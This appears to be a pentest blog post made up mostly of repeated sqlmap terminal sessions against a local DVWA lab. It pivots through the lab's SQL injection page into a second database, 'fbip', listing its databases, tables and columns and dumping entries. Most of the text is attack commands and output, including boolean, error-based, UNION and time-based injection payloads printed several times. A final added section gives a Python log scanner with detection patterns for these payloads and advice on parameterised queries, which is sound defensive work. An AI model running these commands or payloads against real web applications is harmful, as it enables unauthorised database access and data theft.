As in my previous post, looking at the FBIP database works almost the same way as looking at the DVWA database. This time I want to go through DVWA to list the databases (--dbs), and from there I can continue into FBIP.
root@bt:/pentest/database/sqlmap# ./sqlmap.py "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Usage: python ./sqlmap.py [options]
sqlmap.py: error: missing a mandatory
parameter ('-d', '-u', '-l', '-m', '-r', '-g', '-c', '--wizard' or
'--update'), -h for help
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 00:57:14
[00:57:14] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[00:57:14] [INFO] resuming injection
data from session file
[00:57:14] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[00:57:14] [INFO] testing connection to
the target url
[00:57:14] [INFO] testing if the
provided string is within the target URL page content
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[00:57:14] [INFO] manual usage of GET
payloads requires url encoding
[00:57:14] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:57:14] [INFO] fetching database
names
[00:57:14] [INFO] read from file
'/pentest/database/sqlmap/output/localhost/session':
information_schema, dvwa, fbip, mysql
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql
[00:57:14] [INFO] Fetched data logged
to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 00:57:14
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip --tables
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 00:59:42
[00:59:42] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[00:59:42] [INFO] resuming injection
data from session file
[00:59:42] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[00:59:42] [INFO] testing connection to
the target url
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[00:59:42] [INFO] manual usage of GET
payloads requires url encoding
[00:59:42] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:59:42] [INFO] fetching tables for
database: fbip
Database: fbip
[5 tables]
+------------------+
| action_plan |
| data |
| jabatan |
| pegawai |
| progress_history |
+------------------+
[00:59:43] [INFO] Fetched data logged
to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 00:59:43
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data --columns
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 01:11:46
[01:11:46] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[01:11:46] [INFO] resuming injection
data from session file
[01:11:46] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[01:11:46] [INFO] testing connection to
the target url
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[01:11:46] [INFO] manual usage of GET
payloads requires url encoding
[01:11:46] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:11:46] [INFO] fetching columns for
table 'data' on database 'fbip'
Database: fbip
Table: data
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| IDBERITA | varchar(20) |
| IDFILE | varchar(25) |
| NAMAFILE | varchar(255) |
+----------+--------------+
[01:11:46] [INFO] Fetched data logged
to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:11:46
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data -C IDFILE --dump
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 01:18:48
[01:18:48] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[01:18:48] [INFO] resuming injection
data from session file
[01:18:48] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[01:18:48] [INFO] testing connection to
the target url
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[01:18:48] [INFO] manual usage of GET
payloads requires url encoding
[01:18:48] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to
retrieve column names similar to the ones provided with the -C
option? [Y/n] y
[01:18:50] [INFO] fetching columns LIKE
'IDFILE' for table 'data' on database 'fbip'
[01:18:50] [INFO] fetching column(s)
'IDFILE' entries for table 'data' on database 'fbip'
[01:18:50] [WARNING] if the problem
persists with 'None' values please try to use hidden switch --no-cast
(fixing problems with some collation issues)
Database: fbip
Table: data
[0 entries]
+--------+
| IDFILE |
+--------+
+--------+
[01:18:50] [INFO] Table 'fbip.data'
dumped to CSV file
'/pentest/database/sqlmap/output/localhost/dump/fbip/data.csv'
[01:18:50] [INFO] Fetched data logged
to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:18:50
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data -C NAMAFILE --dump
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 01:19:07
[01:19:07] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[01:19:07] [INFO] resuming injection
data from session file
[01:19:07] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[01:19:07] [INFO] testing connection to
the target url
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[01:19:07] [INFO] manual usage of GET
payloads requires url encoding
[01:19:07] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to
retrieve column names similar to the ones provided with the -C
option? [Y/n] y
[01:19:09] [INFO] fetching columns LIKE
'NAMAFILE' for table 'data' on database 'fbip'
[01:19:09] [INFO] fetching column(s)
'NAMAFILE' entries for table 'data' on database 'fbip'
[01:19:09] [WARNING] if the problem
persists with 'None' values please try to use hidden switch --no-cast
(fixing problems with some collation issues)
Database: fbip
Table: data
[0 entries]
+----------+
| NAMAFILE |
+----------+
+----------+
[01:19:09] [INFO] Table 'fbip.data'
dumped to CSV file
'/pentest/database/sqlmap/output/localhost/dump/fbip/data.csv'
[01:19:09] [INFO] Fetched data logged
to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:19:09
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data --columns
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 01:19:12
[01:19:12] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[01:19:12] [INFO] resuming injection
data from session file
[01:19:12] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[01:19:12] [INFO] testing connection to
the target url
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[01:19:12] [INFO] manual usage of GET
payloads requires url encoding
[01:19:12] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:19:12] [INFO] fetching columns for
table 'data' on database 'fbip'
[01:19:12] [INFO] read from file
'/pentest/database/sqlmap/output/localhost/session': IDBERITA,
varchar(20), IDFILE, varchar(25), NAMAFILE, varchar(255)
Database: fbip
Table: data
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| IDBERITA | varchar(20) |
| IDFILE | varchar(25) |
| NAMAFILE | varchar(255) |
+----------+--------------+
[01:19:12] [INFO] Fetched data logged
to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:19:12
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 01:19:20
[01:19:20] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[01:19:20] [INFO] resuming injection
data from session file
[01:19:20] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[01:19:20] [INFO] testing connection to
the target url
[01:19:20] [INFO] testing if the
provided string is within the target URL page content
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[01:19:20] [INFO] manual usage of GET
payloads requires url encoding
[01:19:20] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:19:20] [INFO] fetching database
names
[01:19:20] [INFO] read from file
'/pentest/database/sqlmap/output/localhost/session':
information_schema, dvwa, fbip, mysql
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql
[01:19:20] [INFO] Fetched data logged
to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:19:20
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data --columns
sqlmap/1.0-dev (r4009) - automatic
SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap
for attacking web servers without prior mutual consent can be
considered as an illegal activity. it is the final user's
responsibility to obey all applicable local, state and federal laws.
authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 01:19:59
[01:19:59] [INFO] using
'/pentest/database/sqlmap/output/localhost/session' as session file
[01:19:59] [INFO] resuming injection
data from session file
[01:19:59] [INFO] resuming back-end
DBMS 'mysql 5.0' from session file
[01:19:59] [INFO] testing connection to
the target url
sqlmap identified the following
injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind -
WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND
'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854
FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE
WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1
to 10 columns
Payload: id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=1' AND SLEEP(5) AND
'LOdF'='LOdF&Submit=Submit
---
[01:19:59] [INFO] manual usage of GET
payloads requires url encoding
[01:19:59] [INFO] the back-end DBMS is
MySQL
web server operating system: Linux
Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2,
Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:19:59] [INFO] fetching columns for
table 'data' on database 'fbip'
[01:19:59] [INFO] read from file
'/pentest/database/sqlmap/output/localhost/session': IDBERITA,
varchar(20), IDFILE, varchar(25), NAMAFILE, varchar(255)
Database: fbip
Table: data
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| IDBERITA | varchar(20) |
| IDFILE | varchar(25) |
| NAMAFILE | varchar(255) |
+----------+--------------+
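
Added example (not part of the original post): a log-review sketch that flags, in web server access-log lines, the four injection classes sqlmap listed for the id parameter in the session above. The log lines are constructed from the payloads shown in that output; the Apache-style log format, client address, timestamps and response size are assumptions.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# One signature per technique class listed in the sqlmap output above.
SIGNATURES = {
    "boolean-based": re.compile(r"'\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}

# Client address and request target of an Apache-style access-log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def techniques(value):
    """Return the technique classes whose signature matches a decoded value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan(log_lines):
    """Return (client, parameter, techniques) for each suspicious parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        # parse_qsl URL-decodes, so %27, %20 and '+' are normalised first.
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            found = techniques(value)
            if found:
                hits.append((client, name, found))
    return hits


def sample_line(payload, second):
    """Build one constructed access-log line for a given id= value."""
    return ('127.0.0.1 - - [01/Jan/2012:00:57:%02d +0000] '
            '"GET /dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit HTTP/1.1" '
            '200 4523' % (second, quote(payload, safe="")))


# Constructed sample: a normal request, then the id= payloads from the page.
SAMPLE_PAYLOADS = [
    "1",
    "1' AND 4926=4926 AND 'oAKM'='oAKM",
    "1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),"
    "(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),"
    "CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM",
    "1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),"
    "IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),"
    "CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt",
    "1' AND SLEEP(5) AND 'LOdF'='LOdF",
]
SAMPLE_LOG = [sample_line(p, i) for i, p in enumerate(SAMPLE_PAYLOADS)]

if __name__ == "__main__":
    for client, param, found in scan(SAMPLE_LOG):
        print(client, param, ",".join(found))
```

Pattern matching on logs is triage only: the fix for what the session shows is a parameterised query for id, plus a database account for DVWA that has no privileges on other schemas such as fbip.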